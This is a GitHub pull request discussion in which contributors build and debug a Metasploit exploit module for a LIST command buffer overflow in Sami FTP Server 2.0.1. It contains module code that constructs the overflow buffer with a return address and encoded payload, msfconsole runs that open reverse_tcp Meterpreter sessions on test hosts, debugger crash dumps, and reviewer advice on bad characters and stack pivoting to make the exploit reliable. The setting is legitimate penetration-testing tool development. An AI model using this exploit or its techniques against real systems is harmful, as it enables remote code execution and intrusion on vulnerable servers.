Added module for OSVDB-90815 #1609

Merged
merged 1 commit into from Mar 19, 2013

Conversation

Projects
None yet
3 participants
Contributor

dougsko commented Mar 15, 2013

Thanks a lot for the feedback! Hopefully this is looking a little better now.

Contributor

jvazquez-r7 commented Mar 15, 2013

Thanks, looking into it!

Contributor

jvazquez-r7 commented Mar 15, 2013

It isn't working for me:

msf  exploit(sami_ftpd_list) > show options

Module options (exploit/windows/ftp/sami_ftpd_list):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   FTPPASS  msf              no        The password for the specified username
   FTPUSER  msf              no        The username to authenticate as
   RHOST    192.168.1.133    yes       The target address
   RPORT    21               yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.128    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal


msf  exploit(sami_ftpd_list) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Connecting to FTP server 192.168.1.133:21...
[*] Connected to target FTP server.
[*] Authenticating as msf with password msf...
[*] Sending password...

The network capture:


220-
220 Features p a .
USER msf
331 Password required.
PASS msf
230 Access allowed.
LIST .$-3......CA=.....C......}!....D.".....n.../........lYs8..r...UJT.......8.}..:kR.=...q....c....YM$.......u(.bwT:.K..9.F.(...k(..x.U...t.........z..MzA..?..f........@$...`fn....?6..1...Hl.'..[.....X..B.5..O......Dg..Y.......INr..*....B....f,.}|~1.x%t.5zpur'.Nw(.....O.qsF....:...-K=.A..I.y4...$.........@..G9./.H.?.!.....7J.vC...{g..<...H.pFuy..s~?t'..z$.....8.i.....N..".f<..x7..-...@....=O...rg..Kw.....;.q5..v,.{2.....|/G.C4...%.....I.A}BJ.3.yvx}0..~)..O....r........<,...=|tf...%F.A...$..Jw'.B...qu..{@s......CH1...p-.N...Iz5G4.....?...../g..Kw7...F...s|k..f..zq-tx..O.J.K.%..4..,.......5.y'..@}uB..Hp?/A....)..$vIg=.N~9...;....<.....r.7G{C2......r/~xC!.vO}...y...{|ui....@......w,p$.zH...3..gqf.....=.........t8...#.NB..IK4-.A.....s<......Gq5v7s....?p*.F}+.|%~J.y..u'....r..{"./.Cw0...J.t-z7.....I...Hf.x(.....F,.K...N5.B..:..?g...A.$.<=@G'O...%..4......1....t$.[1..K1C..C....3Zu..W./.p.....Y...>a..4'........+.....+.o........Y.y9......H1.B......~.H...p.Q....n.&p...I.....0.T..<#V..3.v..0..`..:.R..}<..R6..U...q=...d.b%v.......^...`#k...46....;].d.....fC..O..eo9.6.....B../.....M.m.9...;..^...N.....B..j/.|...t..+u..........T.....Z....n...o..to.l,<.s.P7.....i...6P1...|.}.l]
150 Opening data connection.

Tested with the SAMI FTP Server downloaded from exploit-db:

http://www.exploit-db.com/wp-content/themes/exploit/applications/83328fbf45b3ecd1cae18c2c2c75e31d-SamiFTPServer2.0.1.exe

Contributor

jvazquez-r7 commented Mar 15, 2013

btw, no crash on the PMSystem.exe process

Contributor

jvazquez-r7 commented Mar 15, 2013

After some tests, the vulnerability is only triggered in my testing when I vist the "Log" tab in the server managing interface. But still it isn't working.

Im testing on Windows XP SP3 / SamiFTPServer 2.0.1.

Anyway, if you aren't able to trigger the overflow without the user visiting the "Logs" tab in the managing interface, it must be clarified in the description.

Also it should work reliable :)

  • The crash here:
0:004> g
(948.6d4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0000002b ecx=7c91003d edx=00140608 esi=00000001 edi=00000000
eip=81a53a0f esp=0139f910 ebp=cb1f5bc5 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
81a53a0f ??              ???
0:004> !exchain
0139f9e8: 4a251443
Invalid exception stack at 77d503b7
0:004> g
(948.6d4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=4a251443 edx=7c9032bc esi=00000000 edi=00000000
eip=4a251443 esp=0139f540 ebp=0139f560 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
4a251443 ??              ???

@jvazquez-r7 jvazquez-r7 and 2 others commented on an outdated diff Mar 15, 2013

modules/exploits/windows/ftp/sami_ftpd_list.rb
+ 'References' =>
+ [
+ [ 'OSVDB', '90815'],
+ [ 'EDB', '24557'],
+ ],
+ 'Privileged' => false,
+ 'Payload' =>
+ {
+ 'Space' => 955,
+ 'BadChars' => "\x00\x0a\x0d\x20\xff",
+ 'StackAdjustment' => -3500,
+ },
+ 'Targets' =>
+ [
+ [
+ 'Windows Universal',
@jvazquez-r7

jvazquez-r7 Mar 15, 2013

Contributor

Is it true? Which versions of Windows did you try?

@dougsko

dougsko Mar 15, 2013

Contributor

I tried only Windows XP SP3, however since I'm using a JMP address from the application itself, I was thought that would make it universal. If I should be more specific, I'm happy to change it.

@jvazquez-r7

jvazquez-r7 Mar 15, 2013

Contributor

Mainly I guess some memory protections will apply in other operating systems, such as DEP, which would make your exploit to fail.

@wchen-r7

wchen-r7 Mar 19, 2013

Contributor

That's true. It's best to rename your target as Windows XP instead of universal. Normally we don't really call a module universal unless it's really been tested on all of them.

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Mar 15, 2013

modules/exploits/windows/ftp/sami_ftpd_list.rb
+ [ 'OSVDB', '90815'],
+ [ 'EDB', '24557'],
+ ],
+ 'Privileged' => false,
+ 'Payload' =>
+ {
+ 'Space' => 955,
+ 'BadChars' => "\x00\x0a\x0d\x20\xff",
+ 'StackAdjustment' => -3500,
+ },
+ 'Targets' =>
+ [
+ [
+ 'Windows Universal',
+ {
+ 'Platform' => 'win',
@jvazquez-r7

jvazquez-r7 Mar 15, 2013

Contributor

It isn't needed here because you're targeting just one platform, can be deleted.

@jvazquez-r7 jvazquez-r7 commented on an outdated diff Mar 15, 2013

modules/exploits/windows/ftp/sami_ftpd_list.rb
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::Ftp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow',
+ 'Description' => %q{
+ A buffer overflow is triggered when a long LIST
+ command is sent to the server and the user views the Log tab.
+ },
+ 'Platform' => 'Windows',
@jvazquez-r7

jvazquez-r7 Mar 15, 2013

Contributor

'win', no 'Windows'

@jvazquez-r7 jvazquez-r7 and 1 other commented on an outdated diff Mar 15, 2013

modules/exploits/windows/ftp/sami_ftpd_list.rb
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Feb 27 2013'))
+ end
+
+ def exploit
+ connect_login
+
+ buf = rand_text(target['Offset'], payload_badchars)
+ buf << [ target['Ret'] ].pack('V')
+ buf << payload.encoded
+
+ send_cmd( ['LIST', buf], false )
+
+ handler
@jvazquez-r7

jvazquez-r7 Mar 15, 2013

Contributor

In fact, it isn't needed, can be deleted.

@dougsko

dougsko Mar 15, 2013

Contributor

I'm sorry, I'm not sure I understand what are you referring to here.

@jvazquez-r7

jvazquez-r7 Mar 15, 2013

Contributor

The word "handler" can be deleted, the stuff is handled by Exploit indeed :P

Contributor

dougsko commented Mar 15, 2013

Thanks for testing. You're right in that you need to view the Logs tab in order for this to work. Right now, the description says:

A buffer overflow is triggered when a long LIST command is sent to the server and the user views the Log tab.

So that detail is in there, but if you think the wording could use some work, I'm happy to make the edits.

It also seems that I do need to explicitly set the EXITFUNC to either seh or thread. I was under the impression that thread was the default, but it looks like I was wrong.

msf  exploit(sami_ftpd_list) > show options

Module options (exploit/windows/ftp/sami_ftpd_list):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   FTPPASS  ftp              no        The password for the specified username
   FTPUSER  ftp              no        The username to authenticate as
   RHOST    10.1.0.30        yes       The target address
   RPORT    21               yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     10.1.0.10        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal


msf  exploit(sami_ftpd_list) > exploit

[*] Started reverse handler on 10.1.0.10:4444
[*] Connecting to FTP server 10.1.0.30:21...
[*] Connected to target FTP server.
[*] Authenticating as ftp with password ftp...
[*] Sending password...
[*] Sending stage (752128 bytes) to 10.1.0.30
[*] Meterpreter session 3 opened (10.1.0.10:4444 -> 10.1.0.30:1090) at 2013-03-15 14:45:32 -0400

meterpreter >

I do have a question for you as well: FTPUSER and FTPPASS already come free as options with the FTP module, however they are not required. I need to set them to be required but was wondering if there was a better way to do that instead of declaring them as brand new options with OptString. What do you think?

[EDIT] It turns out that valid credentials are not actually required. I am still curious to know what the "correct" way of changing the options' attributes are though.

Contributor

jvazquez-r7 commented Mar 15, 2013

Still not working:

msf  exploit(sami_ftpd_list) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Connecting to FTP server 192.168.1.133:21...
[*] Connected to target FTP server.
[*] Authenticating as msf with password msf...
[*] Sending password...

The default EXITFUNC is process, anyway it referes to the exit method once the payload has been executed, atm In my tests payload isn't being executed at all because the exploit is not gaining execution.

The crash if I debug:

(5d0.f6c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0000002b ecx=7c91003d edx=00140608 esi=00000001 edi=00000000
eip=d8ebedd7 esp=0119f910 ebp=536f03f8 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
d8ebedd7 ??              ???
0:004> !exchain
0119f9e8: 923d732f
Invalid exception stack at 48709115
0:004> g
(5d0.f6c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=923d732f edx=7c9032bc esi=00000000 edi=00000000
eip=923d732f esp=0119f540 ebp=0119f560 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
923d732f ??              ???
Contributor

dougsko commented Mar 15, 2013

That's weird, it's working every time for me. However I did see the same sort of behavior if the payload was too big. I dropped the size a bit to make extra sure everything would fit properly. Previously, I had it exactly as large as I could make it and still get everything to work. Also, and this might really be the issue - before actually kicking off the exploit, I already have the Logs tab open in the GUI. Hopefully, that'll do the trick and if that ends up being the key, I'll be sure to add that into the description. Thanks again for all your time and advice!

Contributor

jvazquez-r7 commented Mar 15, 2013

New test, still no working, remember EIP isn't controlled in my tests at all:

msf > use exploit/windows/ftp/sami_ftpd_list 
msf  exploit(sami_ftpd_list) > show options

Module options (exploit/windows/ftp/sami_ftpd_list):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST                         yes       The target address
   RPORT    21                   yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Windows Universal


msf  exploit(sami_ftpd_list) > set FTPPASS msf
FTPPASS => msf
msf  exploit(sami_ftpd_list) > set FTPUSER msf
FTPUSER => msf
msf  exploit(sami_ftpd_list) > set RHOST 192.168.1.133
RHOST => 192.168.1.133
msf  exploit(sami_ftpd_list) > set VERBOSE true
VERBOSE => true
msf  exploit(sami_ftpd_list) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Connecting to FTP server 192.168.1.133:21...
[*] Connected to target FTP server.
[*] Authenticating as msf with password msf...
[*] Sending password...
msf  exploit(sami_ftpd_list) > 

The crash if I debug:

0:005> g
(610.360): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0000002b ecx=7c91003d edx=00140608 esi=00000001 edi=00000000
eip=7c0442ad esp=0119f910 ebp=907ce97c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
7c0442ad ??              ???
0:004> !exchain
0119f9e8: 1442754e
Invalid exception stack at 71d4221d
0:004> g
(610.360): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=1442754e edx=7c9032bc esi=00000000 edi=00000000
eip=1442754e esp=0119f540 ebp=0119f560 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
1442754e ??              ???

BTW: Are you sure the length of the overflow isn't dependent of length variable data such as the attacker IP. It's what I see around ESP at the moment of crash:

0:005> g
(610.360): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000001 ebx=0000002b ecx=7c91003d edx=00140608 esi=00000001 edi=00000000
eip=7c0442ad esp=0119f910 ebp=907ce97c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
7c0442ad ??              ???
0:004> db esp
0119f910  83 c7 c0 e1 76 3d 30 fe-c6 c1 e2 67 b0 b7 77 7b  ....v=0....g..w{
0119f920  4a 9f 97 14 be 7f 28 eb-34 04 42 27 4f a9 10 d4  J.....(.4.B'O...
0119f930  bf 9b 96 88 e0 39 f8 ba-92 b2 25 89 d6 a8 3f 72  .....9....%...?r
0119f940  71 76 29 e0 70 15 b2 9f-81 e2 48 a8 93 2c 85 f7  qv).p.....H..,..
0119f950  d3 e3 4b 78 75 74 7c 7d-27 0c 67 24 8d b0 b9 14  ..Kxut|}'.g$....
0119f960  66 47 97 96 42 12 d5 b6-9b 73 46 7f 01 eb 1b f5  fG..B....sF.....
0119f970  3d be 80 d6 7a 41 40 b5-03 fc 79 4a 7b 05 b1 3f  =...zA@...yJ{..?
0119f980  37 b4 25 35 2f bf 4e 49-1a f9 4f ba 02 f6 e1 77  7.%5/.NI..O....w
0:004> db esp -100 l100
0119f810  31 39 32 2e 31 36 38 2e-31 2e 31 32 38 20 2d 20  192.168.1.128 - 
0119f820  4c 49 53 54 20 77 c6 df-dc cf 93 ef 4d 27 cd 2a  LIST w......M'.*
0119f830  56 d1 6c 08 94 6e a9 a4-ee 78 ea 36 ac 37 f8 14  V.l..n...x.6.7..
0119f840  d7 4a bd fc 49 fb 9e 92-f8 ad ea cf 8c 01 bc 33  .J..I..........3
0119f850  e7 81 ef d5 e8 c8 2a 9a-6a be a4 d7 b6 16 02 47  ......*.j......G
0119f860  d4 b2 14 db 08 d0 72 3d-5a 2c 73 ab 04 03 11 5d  ......r=Z,s....]
0119f870  b4 36 7a c8 b5 62 c4 3c-7f c1 52 3a 2c fa 64 46  .6z..b.<..R:,.dF
0119f880  b8 e6 6f d3 cc 46 d9 1e-c3 28 4c 58 e0 29 12 17  ..o..F...(LX.)..
0119f890  97 d3 53 b9 fc 60 b3 0e-41 f9 17 9d 2c 57 82 e5  ..S..`..A...,W..
0119f8a0  91 35 07 5a fd 6c fd 73-1d ee 5b e1 40 f5 28 a1  .5.Z.l.s..[.@.(.
0119f8b0  46 2f 32 cf c2 a8 8b 7a-d6 fc db e1 2e 2d b3 29  F/2....z.....-.)
0119f8c0  95 7a 9f 1f eb a1 77 64-76 1c 7c 1c 13 35 13 96  .z....wdv.|..5..
0119f8d0  a9 39 89 55 94 a9 5d 8b-4f 97 6b 75 62 64 43 a7  .9.U..].O.kubdC.
0119f8e0  93 05 53 5d f3 21 0c df-c6 bc d5 aa 12 c5 88 17  ..S].!..........
0119f8f0  2a 87 62 3e 54 bb 3b 48-7c e9 7c 90 ad 42 04 7c  *.b>T.;H|.|..B.|
0119f900  83 82 02 10 3c 2c 22 e3-43 b4 75 7e 74 71 41 93  ....<,".C.u~tqA.
Contributor

dougsko commented Mar 15, 2013

That's a really good point, I hadn't thought of that. Let me try it with a few different IP lengths and under some different VM images and see what I can find.

jvazquez-r7 referenced this pull request in dougsko/metasploit-framework Mar 19, 2013

Merged

cleanup for sami_ftpd_list #1

Contributor

jvazquez-r7 commented Mar 19, 2013

Hi @dougsko,

The submission is still unstable because of badchars and/or sometimes the decoder crashing. I've tried to make it more stable and did pull request to your repo: dougsko#1

I've tried to make it more stable:

  • Finishing badchars analysis
  • Disabling nops before payload (they aren't needed in fact)
  • Stackpivoting before the encoder

Also I've noticed login isn't needed to exploit, so I've switched from connect_login to connect. Finally a little of module cleanup.

Feel free to review the changes and ask anything. Once you're comfortable with changes, feel free to merge the pull request into your repo, so this one will be updated automatically and we'll be mainly ready to merge :)

Thanks!

Contributor

jvazquez-r7 commented Mar 19, 2013

Awesome! thanks @dougsko , merging!

Contributor

jvazquez-r7 commented Mar 19, 2013

btw, last testing result;

msf > use exploit/windows/ftp/sami_ftpd_list 
msf exploit(sami_ftpd_list) > show options

Module options (exploit/windows/ftp/sami_ftpd_list):

   Name      Current Setting      Required  Description
   ----      ---------------      --------  -----------
   FTPPASS   mozilla@example.com  no        The password for the specified username
   FTPUSER   anonymous            no        The username to authenticate as
   RHOST                          yes       The target address
   RPORT     21                   yes       The target port
   SOURCEIP                       no        The local client address


Exploit target:

   Id  Name
   --  ----
   0   Sami FTP Server 2.0.1 / Windows XP SP3


msf exploit(sami_ftpd_list) > set rhost 192.168.1.133
rhost => 192.168.1.133
msf exploit(sami_ftpd_list) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.128:4444 
[*] Sending stage (752128 bytes) to 192.168.1.133
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.133:1363) at 2013-03-19 21:29:23 +0100

meterpreter > exit -y

jvazquez-r7 merged commit 8611109 into rapid7:master Mar 19, 2013

1 check passed

default The Travis build passed
Details
Contributor

dougsko commented Mar 19, 2013

Looks great. Thanks for all of your improvements.

Contributor

jvazquez-r7 commented Mar 20, 2013

np, thank you for your collaboration :)

dougsko deleted the dougsko:osvdb-90815 branch Mar 21, 2013

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment